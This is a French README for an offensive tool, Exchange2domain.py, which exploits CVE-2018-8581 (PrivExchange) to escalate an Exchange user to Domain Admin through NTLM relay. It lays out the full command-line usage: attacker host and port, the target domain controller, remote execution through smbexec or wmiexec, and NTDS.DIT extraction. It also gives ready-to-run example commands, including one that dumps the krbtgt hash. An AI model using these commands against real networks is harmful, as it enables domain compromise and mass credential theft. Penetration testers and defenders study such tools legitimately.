
CVE-2018-8581
Outil tout-en-un de privexchange. Vous avez seulement besoin d'ouvrir le port du serveur web, donc aucun privilège élevé n'est requis.
Excellent article ! Abusing Exchange: One API call away from Domain Admin.
Ces outils nécessitent impacket. Vous pouvez l'installer avec pip via pip install impacket.
usage: Exchange2domain.py [-h] [-u USERNAME] [-d DOMAIN] [-p PASSWORD]
[--hashes HASHES] [--no-ssl]
[--exchange-port EXCHANGE_PORT] -ah ATTACKER_HOST
[-ap ATTACKER_PORT] -th TARGET_HOST
[-exec-method [{smbexec,wmiexec,mmcexec}]]
[--exchange-version EXCHANGE_VERSION]
[--attacker-page ATTACKER_PAGE]
[--just-dc-user USERNAME] [--debug]
HOSTNAME
Échangez vos privilèges contre des privilèges d'administrateur de domaine en abusant d'Exchange. Utilisez-moi avec ntlmrelayx
arguments positionnels:
HOSTNAME Nom d'hôte/IP du serveur Exchange
arguments optionnels:
-h, --help affiche ce message d'aide et quitte
-u USERNAME, --user USERNAME
nom d'utilisateur pour l'authentification
-d DOMAIN, --domain DOMAIN
domaine dans lequel se trouve l'utilisateur (nom de domaine FQDN ou NETBIOS)
-p PASSWORD, --password PASSWORD
mot de passe pour l'authentification, demande si non spécifié et aucun hachage LM:NTLM fourni
--hashes HASHES hachages LM:NTLM
--no-ssl ne pas utiliser HTTPS (se connecte sur le port 80)
--exchange-port EXCHANGE_PORT
port EWS alternatif (par défaut : 443 ou 80)
-ah ATTACKER_HOST, --attacker-host ATTACKER_HOST
nom d'hôte ou IP de l'attaquant
-ap ATTACKER_PORT, --attacker-port ATTACKER_PORT
port sur lequel l'attaque de relais s'exécute (par défaut : 80)
-th TARGET_HOST, --target-host TARGET_HOST
nom d'hôte ou IP du contrôleur de domaine
-exec-method [{smbexec,wmiexec,mmcexec}]
méthode d'exécution distante à utiliser sur la cible (uniquement avec -use-vss). Par défaut : smbexec
--exchange-version EXCHANGE_VERSION
version d'Exchange de la cible (par défaut : Exchange2013, choix : Exchange2010, Exchange2010_SP1, Exchange2010_SP2, Exchange2013, Exchange2013_SP1, Exchange2016)
--attacker-page ATTACKER_PAGE
page à demander sur le serveur attaquant (par défaut : /privexchange/)
--just-dc-user USERNAME
extraire uniquement les données NTDS.DIT pour l'utilisateur spécifié. Disponible uniquement pour l'approche DRSUAPI.
--debug activer la sortie de débogage
exemple :
python Exchange2domain.py -ah attackterip -ap listenport -u user -p password -d domain.com -th DCip MailServerip

Si vous souhaitez seulement vider krbtgt, utilisez --just-dc-user.
exemple :
python Exchange2domain.py -ah attackterip -u user -p password -d domain.com -th DCip --just-dc-user krbtgt MailServerip
Sauvegarde automatique de l'ancien SD pour restauration.
